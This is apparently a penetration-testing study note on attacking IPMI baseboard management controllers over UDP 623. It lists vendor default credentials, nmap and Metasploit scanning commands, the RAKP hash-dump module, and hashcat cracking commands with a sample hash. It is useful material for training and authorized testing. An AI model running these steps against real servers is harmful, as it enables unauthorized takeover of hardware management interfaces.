623 - IPMI - CSPSec

# **Basic Information** According to [HTB Academy](https://academy.hackthebox.com/module/112/section/1245): > [Intelligent Platform Management Interface](https://www.thomas-krenn.com/en/wiki/IPMI_Basics) (`IPMI`) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI is typically used in three ways: > - Before the OS has booted to modify BIOS settings > - When the host is fully powered down > - Access to a host after a system failure > > IPMI communicates over port 623 UDP. Systems that use the IPMI protocol are called Baseboard Management Controllers (BMCs). BMCs are typically implemented as embedded ARM systems running Linux, and connected directly to the host's motherboard. BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI. # **Enumeration** - Attempt to log in with default credentials and/or dump hashes to crack offline | Product | Username | Password | | --------------- | ------------- | ------------------------------------------------------------------------- | | Dell iDRAC | root | calvin | | HP iLO | Administrator | randomized 8-character string consisting of numbers and uppercase letters | | Supermicro IPMI | ADMIN | ADMIN | ## **Scanning** - If IPMI-2.0 is found attempt to dump hashes and crack offline ```bash # default scan sudo nmap -sU --script ipmi-version -p 623 <target_ip> # metasploit scanner msfconsole -qn use auxiliary/scanner/ipmi/ipmi_version ``` ## **Dump Hashes** - If default credentials do not work to access a BMC, we can turn to a [flaw](http://fish2.com/ipmi/remote-pw-cracking.html) in the RAKP protocol in IPMI 2.0. - During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place. - This can be leveraged to obtain the password hash for ANY valid user account on the BMC. - These password hashes can then be cracked offline using a dictionary attack using `Hashcat` mode `7300`. - In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command `hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u` which tries all combinations of upper case letters and numbers for an eight-character password. ```bash # dump hashes msfconsole -qn use auxiliary/scanner/ipmi/ipmi_dumphashes # crack hashes offline hashcat -m 7300 -w 3 -O "93c887ae8200000052f17511d0fd3b9a08350b045e118a2cd0c311777576080bc13a5581d522cdb5a123456789abcdefa123456789abcdef140561646d696e:3541221bac8d7e76f34e45697aed40edfbe87fd8" /usr/share/wordlists/rockyou.txt ``` # **References** # **Practical Application** | Platform | Name | Notes | | -------- | ---- | ----- | | | | |